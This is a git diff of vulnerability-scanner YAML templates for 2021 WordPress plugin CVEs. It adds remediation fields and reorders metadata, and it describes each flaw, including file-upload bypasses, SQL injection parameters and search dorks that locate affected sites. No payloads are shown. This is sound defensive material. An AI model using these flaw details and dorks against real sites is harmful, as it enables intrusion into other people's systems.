susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP. + remediation: Fixed in version 4.22. reference: - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a - https://wordpress.org/plugins/sp-client-document-manager/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24347 - http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html - remediation: Fixed in version 4.22. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-24347 cwe-id: CWE-178 epss-score: 0.96951 - cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99611 + cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:* metadata: - max-request: 4 verified: true - framework: wordpress + max-request: 4 vendor: smartypantsplugins product: sp_project_\&_document_manager + framework: wordpress tags: sp-client-document-manager,wpscan,cve,wp-plugin,wp,authenticated,wordpress,cve2021,rce,packetstorm,intrusive http: diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index 734a15b537..d118a8e04d 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress The Plus Addons for Elementor plugin before 4.1.12 is susceptible to cross-site scripting. The plugin does not properly sanitize some of its fields in the heplus_more_post AJAX action, which is exploitable by both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WordPress The Plus Addons for Elementor plugin (4.1.12 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/2ee62f85-7aea-4b7d-8b2d-5d86d9fb8016 - https://theplusaddons.com/changelog/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24351 cwe-id: CWE-79 epss-score: 0.00145 - cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* epss-percentile: 0.49646 + cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: posimyth product: the_plus_addons_for_elementor + framework: wordpress tags: cve2021,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,cve http: diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index 1eade80563..55358d010a 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue. + remediation: | + Upgrade Plus Addons for Elementor Page Builder to version 4.1.10 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d - https://nvd.nist.gov/vuln/detail/CVE-2021-24358 @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-24358 cwe-id: CWE-601 epss-score: 0.00255 - cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* epss-percentile: 0.62645 + cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: posimyth product: the_plus_addons_for_elementor + framework: wordpress tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,elementor http: diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 11a228353d..08591d9593 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page. + remediation: | + Update the WordPress Jannah Theme to version 5.4.4 or later, which includes a fix for this vulnerability. reference: - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24364 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40864 + cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: tielabs product: jannah + framework: wordpress tags: cve,cve2021,wordpress,xss,wp-theme,wpscan http: diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index 242d65bb12..9d4649c4b3 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Fancy Product Designer plugin before 4.6.9 is susceptible to an arbitrary file upload. An attacker can upload malicious files and execute code on the server, modify data, and/or gain full control over a compromised system without authentication. + remediation: | + Update WordPress Fancy Product Designer plugin to version 4.6.9 or later to fix the vulnerability. reference: - https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/ - https://wpscan.com/vulnerability/82c52461-1fdc-41e4-9f51-f9dd84962b38 @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-24370 cwe-id: CWE-434 epss-score: 0.06587 - cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:* epss-percentile: 0.9286 + cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:“/wp-content/plugins/fancy-product-designer” - framework: wordpress vendor: radykal product: fancy_product_designer + framework: wordpress + google-query: inurl:“/wp-content/plugins/fancy-product-designer” tags: wordpress,wp,seclists,cve,wpscan,cve2021,rce,wp-plugin,fancyproduct http: diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index cf8998aec1..81f3eed5fa 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Pro Real Estate 7 theme before 3.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the ct_community parameter in its search listing page before outputting it back. + remediation: | + Update WordPress Pro Real Estate 7 Theme to version 3.1.1 or later to mitigate the vulnerability. reference: - https://cxsecurity.com/issue/WLB-2021070041 - https://wpscan.com/vulnerability/27264f30-71d5-4d2b-8f36-4009a2be6745 @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-24387 cwe-id: CWE-79 epss-score: 0.00145 - cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:* epss-percentile: 0.49646 + cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: contempothemes product: real_estate_7 + framework: wordpress tags: cve,cve2021,xss,wordpress,wpscan http: diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index d722d81d6b..187413d81f 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response. + remediation: | + Update the WordPress FoodBakery plugin to version 2.2 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/23b8b8c4-cded-4887-a021-5f3ea610213b - https://nvd.nist.gov/vuln/detail/CVE-2021-24389 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24389 cwe-id: CWE-79 epss-score: 0.00158 - cpe: cpe:2.3:a:chimpgroup:foodbakery:*:*:*:*:*:wordpress:*:* epss-percentile: 0.51613 + cpe: cpe:2.3:a:chimpgroup:foodbakery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: chimpgroup product: foodbakery + framework: wordpress tags: cve,cve2021,wordpress,xss,wp-plugin,wpscan http: diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index dc6706b329..13e4224a21 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress wpForo Forum < 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login. + remediation: | + Update wpForo Forum to version 1.9.7 or later to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388 - https://nvd.nist.gov/vuln/detail/CVE-2021-24406 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24406 cwe-id: CWE-601 epss-score: 0.0015 - cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* epss-percentile: 0.50525 + cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: gvectors product: wpforo_forum + framework: wordpress tags: wpscan,wordpress,redirect,cve,cve2021 http: diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index bd35b16d9d..f6146e8edd 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action. + remediation: | + Update the Jannah Theme to version 5.4.5 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24407 cwe-id: CWE-79 epss-score: 0.00161 - cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* epss-percentile: 0.52061 + cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: tielabs product: jannah + framework: wordpress tags: cve,cve2021,wordpress,xss,wp-theme,wpscan http: diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index 73412dcdc1..5761488ed3 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator + remediation: Fixed in version 2.8 reference: - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf - https://nvd.nist.gov/vuln/detail/CVE-2021-24409 - remediation: Fixed in version 2.8 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24409 cwe-id: CWE-79 epss-score: 0.00188 - cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:* epss-percentile: 0.55477 + cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - publicwww-query: "/wp-content/plugins/prismatic" - framework: wordpress + max-request: 2 vendor: plugin-planet product: prismatic + framework: wordpress + publicwww-query: "/wp-content/plugins/prismatic" tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,prismatic,authenticated http: diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index 6e171ea922..56ba97a03f 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues. + remediation: Fixed in version 2.7.12 reference: - https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435 - https://nvd.nist.gov/vuln/detail/CVE-2021-24435 - https://patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability - remediation: Fixed in version 2.7.12 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24435 cwe-id: CWE-79 epss-score: 0.0014 - cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* epss-percentile: 0.48875 + cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: gambit product: titan_framework + framework: wordpress tags: wp,xss,wp-plugin,titan-framework,wpscan,cve,cve2021,wordpress http: diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index 0cda7ed618..7362d34711 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise. + remediation: Fixed in version 2.1.4. reference: - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0 - https://wordpress.org/plugins/w3-total-cache/ - https://wpscan.com/vulnerability/05988ebb-7378-4a3a-9d2d-30f8f58fe9ef - https://nvd.nist.gov/vuln/detail/CVE-2021-24436 - remediation: Fixed in version 2.1.4. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24436 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40466 + cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: boldgrid product: w3_total_cache + framework: wordpress tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated http: diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index 465c233b87..712b9d1556 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise. + remediation: Fixed in version 2.1.5. reference: - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0 - https://wordpress.org/plugins/w3-total-cache/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24452 - remediation: Fixed in version 2.1.5. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24452 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40466 + cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: boldgrid product: w3_total_cache + framework: wordpress tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth http: diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 6a7cedad7a..5abf4d473b 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery. + remediation: | + Update Onair2 to version 3.9.9.2 or higher and KenthaRadio to version 2.0.2 or higher to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a - https://nvd.nist.gov/vuln/detail/CVE-2021-24472 @@ -15,15 +17,15 @@ info: cve-id: CVE-2021-24472 cwe-id: CWE-918 epss-score: 0.02619 - cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:* epss-percentile: 0.88968 + cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - publicwww-query: "/wp-content/plugins/qt-kentharadio" - framework: wordpress + max-request: 1 vendor: qantumthemes product: kentharadio + framework: wordpress + publicwww-query: "/wp-content/plugins/qt-kentharadio" tags: wordpress,lfi,ssrf,wp,wp-plugin,wpscan,cve,cve2021 http: diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 843c534778..2769ad2dad 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages, + remediation: | + Update to the latest version of the WordPress Post Grid plugin (2.1.8 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a - https://nvd.nist.gov/vuln/detail/CVE-2021-24488 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24488 cwe-id: CWE-79 epss-score: 0.00302 - cpe: cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:* epss-percentile: 0.65712 + cpe: cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: pickplugins product: post_grid + framework: wordpress tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin http: diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index f6165228c8..afad38054a 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -5,6 +5,8 @@ info: author: johnjhacking severity: medium description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page. + remediation: | + Update the Wordpress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability. reference: - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://wordpress.org/plugins/marmoset-viewer/#developers @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24495 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44609 + cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: marmoset product: marmoset_viewer + framework: wordpress tags: xss,wpscan,cve,cve2021,wp-plugin,wordpress,intrusive http: diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index edd39ff610..67f2bc1d76 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -5,6 +5,8 @@ info: author: suman_kar severity: medium description: WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php). + remediation: | + Update the WordPress Calendar Event Multi View plugin to version 1.4.01 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 - https://nvd.nist.gov/vuln/detail/CVE-2021-24498 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24498 cwe-id: CWE-79 epss-score: 0.00188 - cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:* epss-percentile: 0.55477 + cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: dwbooster product: calendar_event_multi_view + framework: wordpress tags: cve,cve2021,xss,wordpress,wp-plugin,wpscan http: diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml index 258b781798..4efaefc3fe 100644 --- a/http/cves/2021/CVE-2021-24499.yaml +++ b/http/cves/2021/CVE-2021-24499.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts. + remediation: | + Update to the latest version of the Workreap plugin to fix the vulnerability. reference: - https://github.com/RyouYoo/CVE-2021-24499 - https://nvd.nist.gov/vuln/detail/CVE-2021-24499 @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-24499 cwe-id: CWE-434 epss-score: 0.19069 - cpe: cpe:2.3:a:amentotech:workreap:*:*:*:*:*:wordpress:*:* epss-percentile: 0.95597 + cpe: cpe:2.3:a:amentotech:workreap:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: amentotech product: workreap + framework: wordpress tags: wpscan,packetstorm,cve,cve2021,rce,workreap,wordpress,wp-plugin,intrusive,wp http: diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index 31c3508b41..c694b6fe92 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event. + remediation: | + Update to the latest version of WordPress MF Gig Calendar plugin (>=1.2) which includes proper input sanitization and validation. reference: - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39 - https://nvd.nist.gov/vuln/detail/CVE-2021-24510 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-24510 cwe-id: CWE-79 epss-score: 0.00143 - cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:* epss-percentile: 0.49453 + cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:* metadata: max-request: 2 vendor: mf_gig_calendar_project diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index 1d58776b4f..fbc6e0dfe0 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Paytm Donation plugin (version > 1.3.2) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/f2842ac8-76fa-4490-aa0c-5f2b07ecf2ad - https://wordpress.org/plugins/wp-paytm-pay/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-24554 cwe-id: CWE-89 epss-score: 0.13127 - cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:* epss-percentile: 0.94817 + cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: freelancetoindia product: paytm-pay + framework: wordpress tags: cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,cve http: diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index eecd8276b1..bfbd04e335 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -6,25 +6,25 @@ info: severity: high description: | The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username + remediation: Fixed in version 3.7.1.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-24647 - https://github.com/RandomRobbieBF/CVE-2021-24647 - https://wpscan.com/vulnerability/40d347b1-b86e-477d-b4c6-da105935ce37 - remediation: Fixed in version 3.7.1.6 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2021-24647 cwe-id: CWE-287 epss-score: 0.2135 - cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* epss-percentile: 0.9579 + cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: "true" - framework: wordpress + max-request: 3 vendor: genetechsolutions product: pie_register + framework: wordpress tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp http: diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index 34c6f6bc07..ede35685d7 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -6,26 +6,26 @@ info: severity: critical description: | WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P[\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: Fixed in version 3.5.6. reference: - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe - https://wordpress.org/plugins/podlove-podcasting-plugin-for-wordpress/ - https://github.com/podlove/podlove-publisher/commit/aa8a343a2e2333b34a422f801adee09b020c6d76 - https://nvd.nist.gov/vuln/detail/CVE-2021-24666 - remediation: Fixed in version 3.5.6. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24666 cwe-id: CWE-89 epss-score: 0.20933 - cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* epss-percentile: 0.95759 + cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: podlove product: podlove_podcast_publisher + framework: wordpress tags: cve2021,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,cve http: diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index 52c2c08e34..ab3241ca72 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -6,25 +6,25 @@ info: severity: critical description: | The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection. + remediation: Fixed in version 3.7.1.6 reference: - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a - https://wordpress.org/plugins/pie-register/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24731 - remediation: Fixed in version 3.7.1.6 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24731 cwe-id: CWE-89 epss-score: 0.17893 - cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* epss-percentile: 0.95474 + cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: - 